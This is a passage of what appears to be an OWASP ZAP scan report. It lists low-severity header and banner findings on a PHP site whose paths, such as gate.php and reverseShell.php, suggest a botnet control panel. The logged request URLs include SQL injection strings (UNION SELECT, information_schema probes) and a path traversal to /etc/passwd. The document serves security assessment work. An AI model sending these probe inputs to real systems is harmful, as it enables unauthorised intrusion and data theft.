Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://code.jquery.com/jquery-3.5.1.slim.min.js
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter https://code.jquery.com/jquery-3.5.1.slim.min.js
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
Instances 10
Solution
Ensure JavaScript source files are loaded from only trusted sources, and the sources can't be controlled by end users of the application.
Reference
Tags OWASP_2021_A08
CWE Id 829
WASC Id 15
Plugin Id 10017
Low
In Page Banner Information Leak
Description
The server returned a version banner string in the response content. Such information leaks may allow attackers to further target specific issues impacting the product and version in use.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence Apache/2.4.58
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence Apache/2.4.58
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence Apache/2.4.58
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/
Method GET
Parameter
Attack
Evidence Apache/2.4.58
Request Header - size: 626 bytes.
Request Body - size: 0 bytes.
Response Header - size: 241 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence Apache/2.4.58
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
Instances 5
Solution
Configure the server to prevent such information leaks. For example:

Under Tomcat this is done via the "server" directive and implementation of custom error pages.

Under Apache this is done via the "ServerSignature" and "ServerTokens" directives.
Reference https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/08-Testing_for_Error_Handling/
Tags OWASP_2021_A05
OWASP_2017_A06
WSTG-v42-INFO-02
CWE Id 200
WASC Id 13
Plugin Id 10009
Low
Insufficient Site Isolation Against Spectre Vulnerability
Description
Cross-Origin-Resource-Policy header is an opt-in header designed to counter side-channels attacks like Spectre. Resource should be specifically set as shareable amongst different origins.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter Cross-Origin-Resource-Policy
Attack
Evidence
Request Header - size: 574 bytes.
Request Body - size: 0 bytes.
Response Header - size: 364 bytes.
Response Body - size: 97,496 bytes.
Instances 1
Solution
Ensure that the application/web server sets the Cross-Origin-Resource-Policy header appropriately, and that it sets the Cross-Origin-Resource-Policy header to 'same-origin' for all web pages.

'same-site' is considered as less secured and should be avoided.

If resources must be shared, set the header to 'cross-origin'.

If possible, ensure that the end user uses a standards-compliant and modern web browser that supports the Cross-Origin-Resource-Policy header (https://caniuse.com/mdn-http_headers_cross-origin-resource-policy).
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Cross-Origin_Resource_Policy
Tags OWASP_2021_A04
OWASP_2017_A03
CWE Id 693
WASC Id 14
Plugin Id 90004
Low
Permissions Policy Header Not Set
Description
Permissions Policy Header is an added layer of security that helps to restrict from unauthorized access or usage of browser/client features by web resources. This policy ensures the user privacy by limiting or specifying the features of the browsers can be used by the web resources. Permissions Policy provides a set of standard HTTP headers that allow website owners to limit which features of browsers can be used by the page such as camera, microphone, location, full screen etc.
URL http://142.202.242.172
Method GET
Parameter
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/
Method GET
Parameter
Attack
Evidence
Request Header - size: 626 bytes.
Request Body - size: 0 bytes.
Response Header - size: 241 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter
Attack
Evidence
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 478 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9
Method GET
Parameter
Attack
Evidence
Request Header - size: 709 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter
Attack
Evidence
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter
Attack
Evidence
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method POST
Parameter
Attack
Evidence
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 50
Solution
Ensure that your web server, application server, load balancer, etc. is configured to set the Permissions-Policy header.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Permissions-Policy
https://developer.chrome.com/blog/feature-policy/
https://scotthelme.co.uk/a-new-security-header-feature-policy/
https://w3c.github.io/webappsec-feature-policy/
https://www.smashingmagazine.com/2018/12/feature-policy/
Tags OWASP_2021_A01
OWASP_2017_A05
CWE Id 693
WASC Id 15
Plugin Id 10063
Low
Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s)
Description
The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 441 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 389 bytes.
Response Body - size: 131 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 709 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method POST
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence X-Powered-By: PHP/8.2.12
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
